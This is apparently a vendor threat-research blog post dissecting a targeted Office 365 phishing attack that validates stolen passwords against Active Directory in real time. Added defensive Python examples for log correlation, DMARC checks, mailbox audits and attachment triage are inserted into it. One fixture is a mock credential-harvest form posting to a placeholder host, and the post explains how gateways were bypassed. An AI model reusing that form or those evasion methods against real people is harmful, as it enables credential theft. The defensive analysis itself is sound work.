Blox Tales #15: Credential Phishing Attack Performs Real-Time Active Directory (AD) Authentication
We’re breaking from tradition in this Blox Tale and taking a deeper dive into an advanced credential phishing attack with the Armorblox Threat Research Team. They will pry their eyes away from 6 computer screens each (we counted) to walk us through an Office 365 credential phishing attack that uses real-time validation against the target organization’s active directory. Take it away, team!
Recent times haven’t been easy for proponents of globalization, what with countries retreating behind trade barriers and national borders. Hackers on the internet appear to be facing no such crosswinds, however. Our threat research team finds they are going strong as always, availing themselves of cross-national cloud service providers in their pursuits - in this case, providers like Amazon (Simple Email Service) and Microsoft (Active Directory, Office 365 APIs).
Today, we take a peek behind the curtain of a credential phishing attack targeting an executive at an American brand named among the Top 50 most innovative companies in the world in 2019. Here’s an overview of the attack flow:
Fig: A summary of the credential phishing attack
Here’s the fictional setting of this phishing incident for the purposes of this blog.
- Affected User: Milton Waddams, senior executive at Acme Corporation Ltd.
- His public email address: email@example.com
- Username for his everyday Active Directory Login: firstname.lastname@example.org
- Acme Corporation is a division of the parent company.
Note that the domain used in his public address email (acmecorp.com) is different from the domain name (acmecompany.com) used in his Active Directory login. His public email address reflects a recent rebranding exercise but his Active Directory address remains the older one.
Milton receives an email at the end of his work week, on a Friday evening just before 6 pm. Many employees are likely to have their guard down at the end of their work week.
This email, from “ACH Outward@acmecompany.com” (sender address “email@example.com”) with the subject “ACH Debit report”, has been crafted to catch his eye and at first sight appears to be an internal financial report of sorts.
Fig: Header for the credential phishing email
The email simply reads: “Find enclosed Payment Remittance Report as of 7/11/2020 2:53:14 a.m. Thank you for your business!” The email also contains an attachment with the filename “ACH Milton AcmeCorp” that looks like a text file.
Fig: Body of the credential phishing email (Armorblox detection highlights included)
Armorblox’s Inbound Email Protection is active on the enterprise’s email platform. Armorblox’s platform inspects the email and finds an attachment with HTML content. The attachment is rendered using a headless browser and an image of the webpage is extracted.
Armorblox’s solution uses machine learning models to compare the webpage against common sign on pages at popular internet portals. In this case, the web page is found to resemble the Office 365 sign on page. The email is quarantined out of the user’s mailbox.
Armorblox’s security dashboard alerts the security administrator about this credential phishing incident. Armorblox’s Threat Research Team kicks in to find the provenance and severity of the attack.
Opening the attachment from Office 365 in a browser shows a website identical to the Office 365 sign on page. The username has been pre-entered. A non-standard message “Because you’re accessing sensitive info, you need to verify your password” is noted.
Fig: Attachment opens into webpage resembling the Office 365 sign on page
Further investigation reveals the following:
- The email has been sent from amazonses.com, the Amazon Simple Email Service. The DKIM and SPF checks have passed - i.e. the sender IP address matches amazonses.com.
- The sender domain (j.q.zehfsje.com) is found not to be a valid domain. SPF alignment check has not been enabled.
- The phishing email appears to be generated via a customizable toolkit.
- The toolkit appears to be well written code and has code comments that tell you how to customize to a specific target.
- The script code contains Malay language words, which points to a possible Indonesian connection.
- The source code mentions Milton’s username, and the webpage automatically pre-fills his Active Directory login name, which is different from his current public email address.
- The credentials entered on the sign on page are actively validated in real time against the enterprise’s Active Directory using Office 365 APIs.
- Azure Active Directory sign on logs show an immediate sign on attempt corresponding to XHR requests performed on the attachment webpage.
- If authentication is successful, the user is redirected to zoom.com.
- If authentication fails, the user is redirected to login.microsoftonline.com. This could be a way to hide the phishing attack as just another failed sign on attempt at the Office 365 portal.
- If the entered password text is empty or too short, the user is forced to retry.
Our threat researchers verified the real-time nature of the site by updating the script with a test login and a dummy password and saw a failed login attempt from Provo, Utah in the Azure Active Directory Sign-In portal. As expected, the IP address (220.127.116.11) that attempted the sign-in is the same endpoint to which the phishing script sends the credentials.
Fig: Evidence of failed login attempt
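The correlation the team did by hand here, checking the sign-in log against what the attachment was seen posting to, is something a SOC can automate. The Python below is an added example (not code from the post or from Armorblox): it runs over constructed sign-in records modelled on Azure AD sign-in log fields and flags attempts that come from the kit's validation endpoint, from a hosting-provider range, or that show the failed-then-successful pattern from one non-corporate IP that a real-time validating kit produces. All users, IPs, ranges and the 15-minute window are constructed assumptions.

```python
import ipaddress
from datetime import datetime, timedelta

# Constructed records modelled on Azure AD sign-in log fields (user, timestamp,
# IP, location, result). Not real log data; IPs are from documentation ranges.
SIGNIN_EVENTS = [
    {"user": "milton.waddams@acmecompany.com", "time": "2020-07-10T14:02:05Z",
     "ip": "192.0.2.17", "city": "Phoenix", "status": "success"},
    {"user": "jane.doe@acmecompany.com", "time": "2020-07-10T09:15:00Z",
     "ip": "192.0.2.18", "city": "Phoenix", "status": "failure"},
    {"user": "milton.waddams@acmecompany.com", "time": "2020-07-10T23:58:12Z",
     "ip": "198.51.100.23", "city": "Provo", "status": "failure"},
    {"user": "milton.waddams@acmecompany.com", "time": "2020-07-10T23:59:40Z",
     "ip": "198.51.100.23", "city": "Provo", "status": "success"},
]

# Assumed (constructed) org knowledge: legitimate egress ranges, ranges that
# belong to bulk hosting providers, and the endpoint the phishing page was
# observed posting credentials to during attachment analysis.
CORPORATE_EGRESS = ["192.0.2.0/24"]
HOSTING_RANGES = ["198.51.100.0/24"]
PHISH_ENDPOINTS = {"198.51.100.23"}


def _parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")


def _in_any(ip, networks):
    return any(ip in net for net in networks)


def flag_signins(events, corporate_egress, hosting_ranges, phish_endpoints,
                 window=timedelta(minutes=15)):
    """Return flagged sign-ins, in time order, each with its reasons.

    'high': source is the kit's validation endpoint, a hosting-provider range
    (interactive user logins rarely originate there), or a success from a
    non-corporate IP that follows a failure from the same IP within `window`.
    'low': merely outside corporate egress (remote workers look like this)."""
    egress = [ipaddress.ip_network(n) for n in corporate_egress]
    hosting = [ipaddress.ip_network(n) for n in hosting_ranges]
    history = {}
    findings = []
    for ev in sorted(events, key=lambda e: _parse_time(e["time"])):
        ip = ipaddress.ip_address(ev["ip"])
        when = _parse_time(ev["time"])
        reasons, severity = [], "low"
        if ev["ip"] in phish_endpoints:
            reasons.append("source IP is the phishing kit's credential-validation endpoint")
            severity = "high"
        if _in_any(ip, hosting):
            reasons.append("interactive sign-in from a hosting-provider range")
            severity = "high"
        outside = not _in_any(ip, egress)
        if outside:
            reasons.append("outside corporate egress")
        if ev["status"] == "success" and outside:
            for prev in history.get(ev["user"], []):
                if (prev["status"] == "failure" and prev["ip"] == ev["ip"]
                        and when - _parse_time(prev["time"]) <= window):
                    reasons.append("success follows a failure from the same IP within the window")
                    severity = "high"
                    break
        history.setdefault(ev["user"], []).append(ev)
        if reasons:
            findings.append({**ev, "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in flag_signins(SIGNIN_EVENTS, CORPORATE_EGRESS, HOSTING_RANGES, PHISH_ENDPOINTS):
        print(f["time"], f["user"], f["ip"], f["status"], f["severity"], "; ".join(f["reasons"]))
```

The two Provo events are flagged high on three independent grounds, which matters in practice: even without the attachment analysis or a hosting-range feed, the failure-then-success pair from one outside IP still raises the successful sign-in.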
Infrastructure Behind The Attack
The attacker uses Amazon Simple Email Service to send phishing emails.
The web service behind the credential phishing page is hosted on teenagemoglen[.]com. The domain has been registered at Alibaba.com with a Singapore domain registrar since the end of May 2020. The website is hosted by UnifiedLayer, a hosting company based out of India, at a datacenter in Provo, Utah, United States. The website appears to host web pages copied from another website. None of the links which allow for active engagement with a visitor appear to be active.
Fig: The ‘teenagemoglen[.]com’ domain points to a website that appears unrelated, harmless, and/or copied over
The hosting server itself does not appear to be battened down. This may be to allow for plausible deniability.
Fig: The hosting server itself does not appear to be battened down
The hosting history of teenagemoglen[.]com shows sparse but consistent activity since May 2020; the domain is now on its third hosting provider. Complaints about possible malicious activity may be forcing the attacker to move between small hosting providers that are less sensitive to complaints and less plugged into the network security community.
Global nature of the attacker
The attacker has customized a Malay language toolkit to attack an executive based in Southwest United States using a domain registered in Singapore that’s hosted in the northwest United States by a hosting company based out of India. Someone might want to buy movie rights for ‘Around the World in Eighty Phish’.
The use of cloud services
Amazon SES is used to avoid DKIM/SPF failures, circumvent spam filters and add an air of reputability to the email.
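This is why an SPF or DKIM "pass" on its own says little: both passed for amazonses.com while the visible From: domain was the target's own acmecompany.com, and the findings above note that SPF alignment was not enabled. The Python below is an added example, not code from the post or from Armorblox, showing the DMARC identifier-alignment check (relaxed mode) over a constructed message. The headers, Return-Path, selector and addresses in the sample are invented; the organizational-domain helper is a two-label approximation of the Public Suffix List lookup a real implementation needs.

```python
import email
import email.utils
import re
from email import policy

# Constructed sample, modelled on the authentication pattern the post describes:
# SPF and DKIM both pass for amazonses.com, but the visible From: domain is the
# target's acmecompany.com, so neither authenticated identifier aligns with it.
SAMPLE_EML = """Return-Path: <0101017abcdef-bounce@amazonses.com>
Received: from a1-2.smtp-out.amazonses.com (a1-2.smtp-out.amazonses.com [203.0.113.10])
    by mx.acmecorp.example with ESMTPS id constructed
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=amazonses.com; s=constructed;
    h=From:To:Subject; bh=CONSTRUCTED; b=CONSTRUCTED
Authentication-Results: mx.acmecorp.example; spf=pass smtp.mailfrom=amazonses.com;
    dkim=pass header.d=amazonses.com
From: "ACH Outward" <ach.outward@acmecompany.com>
To: milton.waddams@acmecorp.com
Subject: ACH Debit report

Find enclosed Payment Remittance Report.
"""


def org_domain(domain):
    """Approximate the RFC 7489 organizational domain as the last two labels.
    A production check must consult the Public Suffix List (e.g. for co.uk)."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_auth_results(header):
    """Extract the SPF and DKIM verdicts and their domains from an
    Authentication-Results header (RFC 8601 method=result ptype.prop=value)."""
    out = {}
    m = re.search(r"spf=(\w+)\s+smtp\.mailfrom=(?:[^@\s;]+@)?([^\s;]+)", header)
    if m:
        out["spf"] = (m.group(1).lower(), m.group(2).lower())
    m = re.search(r"dkim=(\w+)\s+header\.d=([^\s;]+)", header)
    if m:
        out["dkim"] = (m.group(1).lower(), m.group(2).lower())
    return out


def dmarc_alignment(raw_message):
    """Return the relaxed-mode DMARC alignment verdict for a raw RFC 5322 message.

    DMARC passes only if at least one of SPF or DKIM both passed AND its domain
    shares the organizational domain of the From: header. A pass for some
    unrelated sending service (here amazonses.com) does not count."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    from_addr = email.utils.parseaddr(str(msg.get("From", "")))[1]
    from_dom = org_domain(from_addr.rsplit("@", 1)[-1])
    auth = parse_auth_results(str(msg.get("Authentication-Results", "")))

    spf_result, spf_dom = auth.get("spf", ("none", ""))
    dkim_result, dkim_dom = auth.get("dkim", ("none", ""))
    spf_aligned = spf_result == "pass" and org_domain(spf_dom) == from_dom
    dkim_aligned = dkim_result == "pass" and org_domain(dkim_dom) == from_dom
    return {
        "from_domain": from_dom,
        "spf": (spf_result, spf_dom, spf_aligned),
        "dkim": (dkim_result, dkim_dom, dkim_aligned),
        "dmarc_pass": spf_aligned or dkim_aligned,
    }


if __name__ == "__main__":
    print(dmarc_alignment(SAMPLE_EML))
```

Had acmecompany.com published a DMARC policy of quarantine or reject, a receiver performing this check would have held the message even though the SES infrastructure itself authenticated cleanly; the verdict is computed on the header alignment, not on the raw SPF/DKIM results.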
Credentials entered on the phishing webpage are authenticated against Office 365 APIs in real time to verify the password. This immediate feedback allows the attacker to respond intelligently during the attack. The attacker is also immediately aware of a live compromised credential, which allows him to establish himself in the compromised account before any remediation.
Remediation will need to be thorough after such a compromise. A non-comprehensive list of activity that will need to be verified:
- Outbound emails post-compromise
- Email account configurations (such as auto-forwarding)
- Activity at all Office 365 properties including OneDrive, etc.
- Any third-party apps in the Office 365 ecosystem that have been granted access
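Three of those four items can be read straight out of exported configuration. The Python below is an added example (not from the post or from Armorblox) that audits constructed exports modelled on Exchange Online inbox rules, mailbox forwarding settings and Microsoft Graph OAuth2 permission grants for the patterns an incident responder looks for after a mailbox takeover: external forwarding, rules that silently delete security notices, rules with empty or punctuation-only names, and app grants with mail or file scopes. The property names follow those objects; every value, domain and keyword list is a constructed assumption. Outbound mail review, the first item, needs message-trace data rather than configuration and is not covered here.

```python
# Constructed exports modelled on Exchange Online / Microsoft Graph objects
# (Get-InboxRule, Get-Mailbox forwarding properties, oauth2PermissionGrant).
# Property names follow those objects; values are invented for the example.
INTERNAL_DOMAINS = {"acmecorp.com", "acmecompany.com"}
SENSITIVE_WORDS = {"password", "security", "alert", "suspicious", "invoice", "payment", "ach"}
HIGH_RISK_SCOPES = {"mail.readwrite", "mail.send", "mail.read", "files.readwrite.all",
                    "mailboxsettings.readwrite", "offline_access"}

MAILBOX = {"ForwardingSmtpAddress": "smtp:reports@mailbox.invalid",
           "DeliverToMailboxAndForward": True}

INBOX_RULES = [
    {"Name": ".", "Enabled": True, "ForwardTo": ["archive@mailbox.invalid"],
     "RedirectTo": [], "DeleteMessage": False, "MoveToFolder": None,
     "SubjectContainsWords": ["ACH", "payment", "remittance"]},
    {"Name": "Cleanup", "Enabled": True, "ForwardTo": [], "RedirectTo": [],
     "DeleteMessage": True, "MoveToFolder": None,
     "SubjectContainsWords": ["password", "security alert", "unusual sign-in"]},
    {"Name": "Newsletters", "Enabled": True, "ForwardTo": [], "RedirectTo": [],
     "DeleteMessage": False, "MoveToFolder": "Inbox\\Newsletters",
     "SubjectContainsWords": ["newsletter"]},
]

OAUTH_GRANTS = [
    {"appDisplayName": "Mail Sync Helper", "consentType": "Principal",
     "scope": "Mail.ReadWrite Mail.Send offline_access"},
    {"appDisplayName": "Calendar Widget", "consentType": "Principal",
     "scope": "Calendars.Read"},
]


def _external(address, internal_domains):
    """True if the address (optionally 'smtp:'-prefixed) is outside the org."""
    addr = address.lower()
    if addr.startswith("smtp:"):
        addr = addr[5:]
    return "@" in addr and addr.rsplit("@", 1)[1] not in internal_domains


def audit_mailbox(mailbox, rules, grants, internal_domains=INTERNAL_DOMAINS):
    """Return a list of findings: mailbox-level forwarding, suspicious inbox
    rules, and third-party app grants with high-risk scopes."""
    findings = []
    fwd = mailbox.get("ForwardingSmtpAddress") or mailbox.get("ForwardingAddress")
    if fwd and _external(fwd, internal_domains):
        findings.append({"category": "mailbox-forwarding", "detail": fwd, "severity": "high",
                         "reasons": ["mailbox forwards to an external address"]})

    for rule in rules:
        if not rule.get("Enabled", True):
            continue
        reasons = []
        targets = [t for key in ("ForwardTo", "RedirectTo", "ForwardAsAttachmentTo")
                   for t in (rule.get(key) or [])]
        external = [t for t in targets if _external(t, internal_domains)]
        words = {w.lower() for w in (rule.get("SubjectContainsWords") or [])}
        sensitive = {w for w in words if any(k in w for k in SENSITIVE_WORDS)}
        if external:
            reasons.append("forwards/redirects to external address(es): " + ", ".join(external))
        if rule.get("DeleteMessage") and sensitive:
            # Attackers hide password-reset and security notices from the victim.
            reasons.append("deletes messages matching " + ", ".join(sorted(sensitive)))
        if not rule.get("Name", "").strip(" .,;-_"):
            reasons.append("rule name is empty or punctuation only")
        if reasons:
            findings.append({"category": "inbox-rule", "detail": rule.get("Name", ""),
                             "severity": "high", "reasons": reasons})

    for grant in grants:
        scopes = {s.lower() for s in grant.get("scope", "").split()}
        risky = sorted(scopes & HIGH_RISK_SCOPES)
        if risky:
            findings.append({"category": "oauth-grant", "detail": grant.get("appDisplayName", "?"),
                             "severity": "medium", "reasons": ["grants " + " ".join(risky)]})
    return findings


if __name__ == "__main__":
    for f in audit_mailbox(MAILBOX, INBOX_RULES, OAUTH_GRANTS):
        print(f["severity"], f["category"], repr(f["detail"]), "; ".join(f["reasons"]))
```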
Bypassing Secure Email Gateway solutions
Commonly deployed Secure Email Gateway (SEG) solutions perform some validation of URL links in email messages. This is commonly done by visiting URLs at the time of email ingress to check the hosted content and by rewriting URLs to route link traffic through a web proxy. The web proxy controls any malicious payload that may be sent to the protected user.
By encoding the malicious payload in an attachment, the attacker has evaded typical URL protection afforded by SEGs.
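With the payload in an attachment rather than behind a link, the gateway control that still applies is the one described earlier in this post: treat the attachment as content to inspect, whatever type it claims to be. The Python below is an added example, not Armorblox code and not the real phishing attachment, that walks a constructed message modelled on the one above (a "text" attachment whose bytes are an HTML sign-in form), sniffs for HTML regardless of the declared content type, and records the features a credential-harvest page tends to have: a password field, a pre-filled identity, and external hosts referenced from forms and scripts. The hosts kit.invalid and cdn.invalid and all addresses are placeholders.

```python
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed message: a text/plain "attachment" whose body is really an HTML
# sign-in form posting to an external host. Not the real phishing attachment.
SAMPLE_EML = (
    "From: ach.outward@acmecompany.com\n"
    "To: milton.waddams@acmecorp.com\n"
    "Subject: ACH Debit report\n"
    "MIME-Version: 1.0\n"
    'Content-Type: multipart/mixed; boundary="b1"\n'
    "\n--b1\n"
    "Content-Type: text/plain\n\n"
    "Find enclosed Payment Remittance Report.\n"
    "--b1\n"
    'Content-Type: text/plain; name="ACH Milton AcmeCorp"\n'
    'Content-Disposition: attachment; filename="ACH Milton AcmeCorp"\n\n'
    "<!DOCTYPE html><html><body>\n"
    '<form action="https://kit.invalid/verify" method="post">\n'
    '<input type="email" name="user" value="milton.waddams@acmecompany.com">\n'
    '<input type="password" name="pw">\n'
    "<p>Because you're accessing sensitive info, you need to verify your password</p>\n"
    "</form>\n"
    '<script src="https://cdn.invalid/kit.js"></script>\n'
    "</body></html>\n"
    "--b1--\n"
)


class FormScanner(HTMLParser):
    """Collects the features a sign-on page lookalike tends to carry."""

    def __init__(self):
        super().__init__()
        self.password_field = False
        self.prefilled_identity = None
        self.external_hosts = set()
        self._in_script = False

    def _note_url(self, value):
        host = urlparse(value or "").hostname
        if host:
            self.external_hosts.add(host.lower())

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input":
            if (a.get("type") or "").lower() == "password":
                self.password_field = True
            if "@" in (a.get("value") or ""):
                self.prefilled_identity = a["value"]   # targeted: victim pre-filled
        for key in ("action", "src", "href"):
            if a.get(key):
                self._note_url(a[key])
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:   # inline script: harvest any hard-coded endpoints
            for host in re.findall(r"https?://([^/\s'\"<>]+)", data):
                self.external_hosts.add(host.lower())


def looks_like_html(text):
    """Content sniff: HTML markup in the first 4 KB, whatever the declared type."""
    head = text.lstrip()[:4096].lower()
    return head.startswith(("<!doctype html", "<html")) or \
        bool(re.search(r"<\s*(script|form|input)\b", head))


def triage_attachments(raw_message):
    """Return one finding per attachment, with an HTML/credential-form verdict."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename()
        if part.get_content_disposition() != "attachment" and not filename:
            continue   # inline body text, not an attachment
        payload = part.get_content()
        if isinstance(payload, bytes):
            payload = payload.decode("utf-8", "replace")
        is_html = part.get_content_type() == "text/html" or looks_like_html(payload)
        scanner = FormScanner()
        if is_html:
            scanner.feed(payload)
        verdict = "other"
        if is_html:
            verdict = "credential-harvest" if scanner.password_field else "html"
        findings.append({"filename": filename, "declared_type": part.get_content_type(),
                         "is_html": is_html, "password_field": scanner.password_field,
                         "prefilled_identity": scanner.prefilled_identity,
                         "external_hosts": scanner.external_hosts, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in triage_attachments(SAMPLE_EML):
        print(f)
```

The external hosts recovered here are what feed the sign-in log correlation: any Azure AD sign-in arriving from the IP those hosts resolve to is the kit validating a victim's password, not the victim.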
Targeted nature of attack
The attacker is apparently aware that Acme Corporation is still using acmecompany.com for internal Active Directory authentication and has not switched to acmecorp.com yet. This is likely not common knowledge.
The limited activity at the website hosting the phishing attack and the careful timing of the email to a Friday evening also suggests this is a carefully crafted attack specifically targeted at Milton inside the organization.
Our estimates show there have been 120-odd visits to this website globally since the beginning of June. The sparse number suggests the phishing scams are targeted rather than spray and pray.
Never a dull moment at the Armorblox Threat Research team. Even on Friday evenings.